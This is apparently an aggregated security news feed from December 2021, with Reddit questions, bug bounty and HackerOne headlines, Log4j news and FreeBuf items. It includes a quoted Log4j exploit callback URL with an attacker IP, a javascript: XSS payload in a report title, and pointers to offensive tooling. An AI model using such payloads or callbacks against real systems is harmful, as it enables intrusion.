/usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB) It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team member will have access to customer data on Google Drive, so we want to enforce those team members to only view such data via corporate VPN. Our sales team members do not have access to customer data, so we do not want them to login via VPN because that's extra friction. ​ After researching online, I found two ways of doing this: a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en Pro: set up seems straightforward, and can configure based on teams Con: pay more per user, it's like $8 more per user to our current edition b. Set up gSuite to login with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix Pro: Saves money, get more familiar with SAML which seems useful? Questions for experts here about this approach: Is it easy to quickly provision which users are required to login via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time? ​ Which one would you advise us to go for? Any thoughts are tremenduously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering is it possible to put Okta behind VPN. If employees are not connected to company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
    Hello everyone, soon I will be moving out of my parents house, and I'm interested on the topic of home networking, security and privacy. Here are my plans, currently for the last 4 years I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remote via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows, also if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with seperate SSID's that won't communicate between eachother (basically what I'm asking is it possible to have separate networks for guests and me ? ​ I would have some IoT devices such as a smart TV but is it possible to filter it out in ACL so that the TV only has LAN but can't connect to the internet ? Since I'm moving out it will be a great learning experience to make my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for ? Which model is the best, should I go for OpenWRT ? Should I get a L3 switch ? If so what model would be the best ? Is it possible to separate my home network into smaller ones that won't communicate between each other (guest, my personal and IoT LAN devices) ? Well that's all the questions I have, thank you in advance. ​ EDIT: I forgot to add this I would need WiFi so that means I would need some WiFi Access Points, which models should I look for ? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately i have to do one year of military service,i will be 25 1/2 or 26 when i finish. There is a gap between me as a mis student and cs students. Thankfully it wasn’t as big as i thought. The interviewer liked my python skills and reverse skills. However he told me i need to strength my networking and web skills and told me to study compitaA+ and compita security . Told me if i want to study malware analysis i should study architecture and os. The interviewer liked that i am a geek the most part and although it isn’t my major i kept studying security and exploitation. Between the time of my service and now i should start studying networks ,web,os,and architecture. So couple of questions now . 1-I I have an ardunio,can i study OS and architecture from it ? 2-He told me to apply again after finishing these courses but the cyber security isn’t demanded in the labor market of my country yet. So i was thinking of working remotely till then,any advices on that? I was thinking of hackthebox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid ?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid ? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that booth port 6666 and 8443 are open. I never used any kind of software related to irc. I have a laptop running Ubuntu, a Xbox and 2 iPhones on my network. I think the culprit might be my Asus router as I checked my laptops firewall setup without any leads. Disabling UpnP doesn’t do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    Viaggio all'interno delle recensioni 5 stelle di Amazon
    Tra intermediari e DataLeak Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    基于大数据技术的攻击溯源研究 by ourren Java代审1:Maven基础知识 by jinxing 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    forensic image infected analysis
    I would like to ask what if i got usb with image from someone for analysis and i found that the usb is infected. what should i do to start analyzing it (connect to my lab (FRED) or install mys tools on vm for analysis or what? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

    FreeBuf早报 | 中国首套“新闻数字藏品”发行;《舞力全开》用户数据遭泄露
    新华社在今天发行中国首套“新闻数字藏品”NFT。  ( 1 min )
    疑似“肚脑虫”APT组织近期针对孟加拉国的攻击活动分析
    Donot“肚脑虫”是疑似具有南亚背景的 APT 组织,其主要以周边国家包括巴基斯坦、孟加拉国、尼泊尔和斯里兰卡的政府和军​​事为目标进行网络攻击活动。  ( 1 min )
    “杀不掉”的“虚灵矿工”——门罗币挖矿木马分析报告
    该挖矿木马在文件末尾附加了大量空字节、使自身大小达到百MB级别,从而达到杀软和沙箱检测逃逸的目的。  ( 1 min )
    K-12教育应用存在“严重安全风险”
    K-12教育使用的许多应用程度存在各种严重的安全问题,其中包括可能导致学生数据“不受监管和失控”地分享给广告公司。
    美国最新的Hack DHS漏洞赏金计划已包含log4j相关漏洞
    为了应对最近发现的 log4j 漏洞,部门正在扩大Hack DHS漏洞赏金计划的范围,包括额外的激励措施,以发现和修补系统中与log4j有关的漏洞。  ( 1 min )
    Microsoft Teams 允许网络钓鱼漏洞,自3月至今未被修复
    Microsoft Teams 是一款基于聊天的智能团队协作工具,可以同步进行文档共享、语音、视频会议等即时通讯功能。  ( 1 min )
    调查显示,60%项目中带有已知漏洞未打补丁的软件可让攻击者进一步渗透
    来自数十项渗透测试和安全评估的数据表明,几乎每个组织都可能被网络攻击者渗透。
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do u have to be an expert in other things like web security/pen testing for example. I enjoy doing reversing and finding bugs and exploiting them(still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I’ve always found those pretty boring and I never really enjoy the process as much as I do from reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I’m not laser focused into getting a job in this field as I’m still a software engineer and do this as a hobby but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )

  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making bootable Caine OS usb from rufus and balena etcher non of them were bootable, how do you fix missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot Caineos from usb
    just downloaded caine os, but caine11.0.iso does not have a boot file computer boots into black screen when booting from usb submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    is the Acronis vulnerability scan reliable? it detects my docker, python, apple music have vulnerability. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I’m going to share some tips on how to become a successful bug hunter. I´m Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello ! ​ I am currently applying (learning purpose) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ ​ However i m unable to reproduce the same behavior and get a shell... ​ I m currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. ​ I m a beginner and don't feel comfortable with some points: - does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...). - Moreover "Leak scanf" has a strange value interpreted as string "JHmp" - Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh ? - When invoking "Leak system" with "SHELL=/bin/bash" does it work with prefix "SHELL=" ? Or need another string ? - In comments someone said he had an issue with scanf interpreting space 0x20 but after checking address I think I m not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error ? ​ Could you help me to understand why it doesn't work ? I have attached screenshots with values of the stack, registers, etc to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip") ​ Many thanks !! ​ Update: ​ I have updated my libc and it works fine now... Still don't understand why it didn't work before. ​ Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, Would like a quick opinion- suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my macbook for any access events or really anything at all just in case and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like reference to some update and looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my macbook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my macbook? Or otherwise, any idea what these console events could be regarding? I am already working with US secret service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    A cloud security vendor, Wiz.io discovered a four years old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service, when users use the “Local Git” deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk for information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft and the company added a “web.config” file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What are threads can identify on packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying about Linux systems in University now. And I'm pretty confused if Linux and UNIX are two different entities cuz my college professor seems to use these terms interchangeably and creating all this massive chaos between these two lol. So I did some research at my own to see the difference but the results were quite confusing at first glance, so now I want yall to give me correct answer, are they both same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur wont let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive after so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formating the drive will be enough. I've heard of DBAN but it seems more for internal drive and I'm paranoid that might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello Everyone, I am requesting you to fill this survey. it will help me to archive my final year research project. this project is based on developing network streaming analytics in nearly real-time with IoT devices. link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17 [link] [comments]
    help a newbie understand what's happening with https & SSL/TLS question.
    Hello all, I'm a little confused on https and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used letsencyrpt ssl certs when adding the host to my proxy manager. In Cloudflare I'm using full SSL/TLS encrypt setting. When I go to my service outside of my network it says not secure in the toolbar. I asked this question in another sub and was told it was okay. but I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? ​ The service does work over https but it also wants me to point it to the PKCS #12 file. I download the certs from proxy manager and not sure what file to actually upload. I can get help on this question in that services sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500 [link] [comments]  ( 1 min )
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior level IT execs just trying to sell a product. But I learn that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it?Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? Of yes, what event(s)? submitted by /u/gnomeparadox [link] [comments]  ( 5 min )
  • Open

    On Writing DFIR Books, pt III
    Editing and Feedback When it comes to writing books, having someone can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…  ( 6 min )
  • Open

    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz [link] [comments]
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder [link] [comments]
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm [link] [comments]
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu [link] [comments]
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius [link] [comments]
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus [link] [comments]  ( 1 min )
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 2easy暗网正在倾销窃取的数据;恶意程序Joker被下载50万次
    安全人员发现,一个名为“2easy”的暗网市场正在大幅倾销数据,这些数据是从约 600,000 台感染的设备上窃取。  ( 1 min )
    硅谷快速致富的新工作:加密初创企业
    更多人是被Web3的精神所吸引,寻求权力和决策的下放。  ( 1 min )
    直播回顾 | CIS 2021春日版议题预告直播继续与您相约~
    在冬至最长的夜里,近万人守候在FreeBuf直播间,观看CIS 2021春日版议题预告直播。  ( 1 min )
    漏洞危机爆发时,企业该做什么?
    有关安全漏洞事件,国家有一套详细的法律法规,约束相关企业“尽早申报”,协助相关行业的企事业单位即时“补漏”。
    一篇文章玩明白Stack-migration
    一篇文章玩明白Stack-migration.  ( 2 min )
    实用技能:域名解析故障排查的几种常见方法
    DNS域名解析是访问网站的重要环节之一。
    戴尔BIOS更新后可能导致电脑无法正常启动
    戴尔最近发布的BIOS更新在多个笔记本电脑和台式机型号上引起严重启动问题。  ( 1 min )
    《上海市建设网络安全产业创新高地行动计划(2021-2023年)》全文发布
    总的来说,《行动计划》共提出4项主要目标,3大建设高地,10项建设任务,以及7项保障措施。
    安全知识图谱 | 绘制软件供应链知识图谱,强化风险分析
    《践行安全知识图谱,携手迈进认知智能》精华解读系列第七篇,介绍了知识图谱相关技术如何在软件供应链安全领域应用。  ( 1 min )
    企业IoTOT网络安全现状
    在2021年发生了多起针对网络设备、监控系统、管道和水处理设施的知名网络攻击事件,使得大幅改进IoT/OT网络安全的需求变得更加明显。  ( 1 min )
    TikTok Live Studio 使用OBS源代码,违反GPL协议
    近日,有推特用户称TikTok最新上线的软件TikTok Live Studio疑似使用了OBS (Open broadcasting Software)的源代码,但是却没有遵守相关的开源许可条款。  ( 1 min )
    谷歌警告称,超过35000个Java包受 Log4j 漏洞影响
    谷歌扫描Maven Central Java软件包库,发现35863个软件包使用的Log4j库版本易受Log4Shell漏洞攻击。  ( 1 min )
    DNS Flood类型攻防梳理和思考
    重点针对攻击原理、防护原理进行说明,针对如何测试,提供参考。  ( 1 min )
    SIP协议报文攻击与防御
    攻击原理SIP(Session Initiation Protocol)是一个应用层的信令控制协议。用于创建、修改和释放一个或多个参与者的会话。这些会话可以是Internet多媒体会议、IP电话或多媒  ( 1 min )
    FreeBuf早报 | 阿里云被暂停工信部网络安全威胁信息共享平台合作单位;摩根员工使用加密应用被罚2亿美元
    全球各地麻烦事儿都不少,FreeBuf早报,安全早知道。  ( 1 min )
  • Open

    Google搜尋技巧 -只會關鍵字不夠,利用這7招強化搜尋力
    參考資料: https://support.google.com/websearch/answer/2466433 Continue reading on Medium »
  • Open

    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone Continue reading on Medium »  ( 2 min )

  • Open

    Can you recommend any tool for packet sniffing with the ability to filter traffic by processes?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL, TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo [link] [comments]  ( 1 min )
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
    How do you curate the learning resources out there for cybersecurity?
    As a cybersecurity professional we always keep learning new things. The best part of the internet is that there's free and paid fees out there and there are many options. The worst part is also that there are so many option. So how to do curate if a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe to see what fits but now I'm overwhelmed where to start because there are too many good resources. submitted by /u/writerlyhacker [link] [comments]  ( 1 min )
    Incident handling/response certs?
    have mixed feelings about certifications providing any real value but we have funds for a cert and I’m hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey, curious if anyone has any they would recommend. submitted by /u/freeridevt [link] [comments]  ( 1 min )
    Will attack such as LLMNR, NBT-NS and MDNS poisoner cause any issue to internal network?
    I've seen these kind of attacks are pretty common in any internal pentest tutorial. But is this save? Will it cause any issue to customer's network? submitted by /u/w0lfcat [link] [comments]  ( 1 min )
    What is the best way to log DNS when DoH is used?
    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea for the DNS name? The only sources I know are: Domain names extracted from SSL certificates Autonomous System lookups combined with maybe port number Manual DNS lookups I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit [link] [comments]  ( 1 min )
    Guys I recently download some photorecover apps and I'm scared that they might have stolen my photos
    Are most google play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    ModSecurity: Add custom error page or header to blocked requests
    Hi, Using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (or is it using the Ingress settings?) submitted by /u/QuickWin1 [link] [comments]  ( 1 min )
  • Open

    【安全通报】Apache HTTP Server 更新多个安全漏洞(CVE-20...
    近日,Apache HTTP Server 发布安全更新,修复了 Apache HTTP Server 中的服务端请求伪造(SSRF)和缓冲区...  ( 1 min )
  • Open

    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0  ( 3 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 2 min )
    Hook Heaps and Live Free
    submitted by /u/jat0369 [link] [comments]
